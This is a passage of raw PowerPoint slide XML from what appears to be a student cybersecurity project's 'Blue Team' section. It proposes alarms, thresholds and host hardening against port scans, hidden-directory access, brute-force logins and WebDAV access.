          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E988DE5-EF69-5B20-999D-41EDF135E229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="915759" y="3189693"/>
            <a:ext cx="3656241" cy="160601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1199" name="Google Shape;1199;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">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201" name="Google Shape;1201;p6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23</a:t>
            </a:fld>
            <a:endParaRPr sz="6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7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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p7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08" name="Google Shape;1208;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="30513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kind of alarm can be set to detect future port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>An alert could be set to trigger when large amounts of traffic occurs in a short time from a single IP address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 sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Alarms should trigger if a given IP address send more than 10 requests per second for more than 5 seconds</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>The Firewall can be used to throttle incoming connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Enable only the traffic needing to access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>interntal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> hosts and deny everything else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Create an IP allowed list </a:t>
            </a:r>
            <a:endParaRPr sz="1000"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r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Create and setup IP tables for the firewall port blocking and scanning. Using an IDS like Kibana and Splunk allows immediate alerts for port scanning activity</a:t>
            </a:r>
            <a:endParaRPr sz="10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Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p7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16" name="Google Shape;1216;p71"/>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kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>An alarm that triggers if any requests made for the hidden directories from outside of the company’s internal network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Create an alarm that triggers if sequential requests are being made from a single IP address that is not in the Allowed IP list.</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>A threshold for sequential requests from a single IP address should be set  for greater than 0 and immediately send an email to the SOC Analyst when triggered by an unknown IP not on the list</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p71"/>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configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Encrypt the contents of hidden directories and its contents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Stronger usernames and password requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Disable directories listing in the Apache server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Update the webpage</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Create a whitelist for authorized IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Change permissions and make the folder private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Update webpage and remove everything that has password listings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Proper training is needed</a:t>
            </a:r>
            <a:endParaRPr sz="10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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p7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24" name="Google Shape;1224;p72"/>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kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>An alarm should be set to trigger if a threshold number of requests to the server from a single IP address is reached. Especially with a HTTP response of 401 Unauthorized. Brute force attacking requires a high number of requests to complete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>An alert should be set if any user on the system has several failed authentication attempts</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>A threshold should be set for greater than 50 requests from a single IP address in the span of 5 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Greater than 3 consecutive failed authentication attempts should trigger an alarm</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4453643" y="1466554"/>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configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Use unique usernames and stronger passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Restict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> access to authentication URL’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Two-factor authentications for ALL users in the company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Setting up a lockout after 3 consecutive failed attempts from the same IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Use a CAPTCHA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Strong passwords are long, unique, and harder to crack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>With a lockout, attackers will only be able to try a few passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Two-factor authentication requires an additional code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>CAPTCHA’s prevents access by bots and auto tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr sz="10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7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Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p7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32" name="Google Shape;1232;p73"/>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kind of alarm can be set to detect future access to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>An alarm should be set to trigger if any access outside of the company’s internal network is made to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> directory</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Alarm should trigger when any access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> directory is made, especially from unknown IP addresses not on the whitelist</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4479957" y="144024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configuration can be set on the host to control access?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Make sure software patches are up to date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Disable WebDav or make sure configured correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Do not store instructions on how to access the server on a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>The host should be configured to deny WebDav uploads by default and only from specific IP addresses</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Filebeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> or Splunk on host machine(s) for monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
